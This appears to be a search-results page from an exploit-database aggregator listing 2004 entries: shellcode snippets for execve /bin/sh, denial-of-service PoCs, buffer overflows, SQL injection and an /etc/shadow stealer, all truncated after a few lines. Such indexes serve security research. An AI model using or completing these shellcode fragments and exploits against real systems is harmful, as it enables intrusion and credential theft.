Lucene search
+L

2081 matches found

zdt
zdt
added 2004/09/12 12:0 a.m.29 views

linux/x86 bsd/x86 execve /bin/sh 38 bytes

Exploit for multiple platform in category shellcode ========================================= linux/x86 bsd/x86 execve /bin/sh 38 bytes ========================================= / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68"...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.16 views

linux/x86 execve /bin/sh 24 bytes

No description provided by source. / [email protected] execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // mov...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.27 views

linux/x86 execve /bin/sh xor encrypted 55 bytes

linux/x86 execve /bin/sh xor encrypted 55 bytes. Shellcode exploit for linx86 platform / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl...

0.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.18 views

linux/x86 execve /bin/sh xor encrypted 55 bytes

No description provided by source. / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl %ebx,0x8%esp movl %edx,0xc%esp movb $0xb,%al leal 0x8%esp,%e...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2004/09/09 12:0 a.m.29 views

CitadelUX 6.23 - Remote USER Directive

CitadelUX 6.23 - Remote USER Directive / Citadel/UX remote exploit By nebunu: pppppppal at yahoo dot com This is the version which contains targets,abuse it kiddies Bruteforce: You only have 4096/4=1024 tries. The magic offset lies about 2048 + or - 4,8,16....256 So practically speaking you have...

7.5AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/08/31 12:0 a.m.42 views

CesarFTP Server - Long Command Denial of Service

/ ----------------------------------------------------------------------- cesarftp.c - Cesar FTP Server Long Command DoS Exploit Copyright C 2000-2004 HUC All Rights Reserved. Author : lion : [email protected] : http://www.cnhonker.com Date : 2004-08-30...

5.8AI score
SaveExploits0
exploitpack
exploitpack
added 2004/08/27 12:0 a.m.21 views

Gaucho 1.4 - Mail Client Buffer Overflow

Gaucho 1.4 - Mail Client Buffer Overflow // // Gaucho Ver 1.4 Mail Client Buffer Overflow Vulnerability // Bind Shell POC Validation Code for English Win2K SP4 // 10 Aug 2004 // // Gaucho is an Email client developed by NakedSoft for Microsoft Windows // platforms. Gaucho supports SMTP, POP3 and...

0.4AI score
SaveExploits0
seebug.org
seebug.org
added 2004/08/27 12:0 a.m.18 views

Easy File Sharing Webserver 1.25 Denial of Service Exploit

No description provided by source. Easy File Sharing Webserver v1.25 Denial Of Service Proof Of Concept Code By GulfTech Security Research Easy File Sharing Webserver v1.25 will consume 99% of CPU usage until it crashes when sent large req's use IO::Socket; print...

7.1AI score
SaveExploits0
securityvulns
securityvulns
added 2004/08/27 12:0 a.m.31 views

WinAmp => 5.04 XML Remote Code exec

hello.. security.nnov.ru team i just coded an exploit to the WinAmp = 5.04 XML Remote Code exec bug if you like.. check The exploit http://blackhat.tv/skinhead.tgz a readme http://blackhat.tv/skinhead/README a working sample http://blackhat.tv/skinhead/ let it go out to the wild! greetings Daniel...

0.4AI score
SaveExploits0
exploitpack
exploitpack
added 2004/08/27 12:0 a.m.12 views

Painkiller 1.3.1 - Denial of Service

Painkiller 1.3.1 - Denial of Service / by Luigi Auriemma / include include include ifdef WIN32 include include "winerr.h" define close closesocket else include include include include include endif define VER "0.1" define BUFFSZ 2048 define PORT 3455 define TIMEOUT 3 define GAMEVER "1.3" define...

0.3AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/08/27 12:0 a.m.53 views

Gaucho 1.4 - Mail Client Buffer Overflow

// // Gaucho Ver 1.4 Mail Client Buffer Overflow Vulnerability // Bind Shell POC Validation Code for English Win2K SP4 // 10 Aug 2004 // // Gaucho is an Email client developed by NakedSoft for Microsoft Windows // platforms. Gaucho supports SMTP, POP3 and other email delivery protocols. // Gaucho...

7.5CVSS5.8AI score0.06708EPSS
SaveExploits2
seebug.org
seebug.org
added 2004/08/26 12:0 a.m.16 views

BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit

No description provided by source. !/usr/bin/perl BadBlue v2.52 Web Server - Multiple Connections DoS POC Code BadBlue Web Server can not handle many simultaneous connects from the same host, and will lock up until the connects stop This Proof Of Concept Written By GulfTech Security Research use...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/08/26 12:0 a.m.19 views

BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit

Exploit for unknown platform in category dos / poc ====================================================================== BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit ====================================================================== !/usr/bin/perl BadBlue v2.52 Web...

7AI score
SaveExploits0
zdt
zdt
added 2004/08/25 12:0 a.m.27 views

Hafiye 1.0 Remote Terminal Escape Sequence Injection Vulnerability

Exploit for linux platform in category remote exploits ================================================================== Hafiye 1.0 Remote Terminal Escape Sequence Injection Vulnerability ================================================================== / Remote Exploit for Hafiye-1.0 Terminal...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2004/08/25 12:0 a.m.16 views

RealVNC Server 4.0 - Remote Denial of Service

RealVNC Server 4.0 - Remote Denial of Service // source: https://www.securityfocus.com/bid/11048/info RealVNC server is reported prone to a remote denial of service vulnerability. This issue presents itself when an attacker establishes a large amount connections to the server. This issue was...

SaveExploits0
seebug.org
seebug.org
added 2004/08/24 12:0 a.m.21 views

MusicDaemon <= 0.0.3 v2 Remote DoS and /etc/shadow Stealer

No description provided by source. / MusicDaemon = 0.0.3 v2 Remote /etc/shadow Stealer / DoS Vulnerability discovered by: Tal0n 05-22-04 Exploit code by: Tal0n 05-22-04 Greets to: atomix, vile, ttl, foxtrot, uberuser, d4rkgr3y, blinded, wsxz, serinth, phreaked, h3x4gr4m, xaxisx, hex, phawnky,...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/08/24 12:0 a.m.20 views

MusicDaemon <= 0.0.3 v2 Remote DoS and /etc/shadow Stealer

Exploit for linux platform in category remote exploits ========================================================== MusicDaemon Hello ...... bin::9797:0::::: ftp::9797:0::::: sshd::9797:0::::: ...... email protected:/test Server Side View: email protected:/test/musicdaemon-0.0.3/src ./musicd -c...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/08/20 12:0 a.m.24 views

phpMyWebhosting SQL Injection Exploit

No description provided by source. !/usr/bin/perl Exploit code by Noam Rathaus of Beyond Security Ltd. The following exploit code will use a valid username and password combination, to cause an SQL injection. Using the SQL injection, the Perl script elevates the privileges of the user provided to...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/08/20 12:0 a.m.36 views

phpMyWebhosting - SQL Injection

!/usr/bin/perl Exploit code by Noam Rathaus of Beyond Security Ltd. The following exploit code will use a valid username and password combination, to cause an SQL injection. Using the SQL injection, the Perl script elevates the privileges of the user provided to administrative. use IO::Socket; us...

7.5CVSS5.8AI score0.02444EPSS
SaveExploits2
Exploit DB
Exploit DB
added 2004/08/20 12:0 a.m.40 views

XV 3.x - '.BMP' Parsing Local Buffer Overflow

/ xv exploit for the bmp parsing buffer overflow infamous42md AT hotpop DOT com PEOPLE STOP EMAILING MY BUGTRAQ ADDRESS AND USE THIS ONE!! n00batlocalho.outernet gcc -Wall xvbmpslap.c n00batlocalho.outernet ./a.out Usage: ./a.out align n00batlocalho.outernet ./a.out 0xbffff388...

5.8AI score
SaveExploits0
Rows per page
Query Builder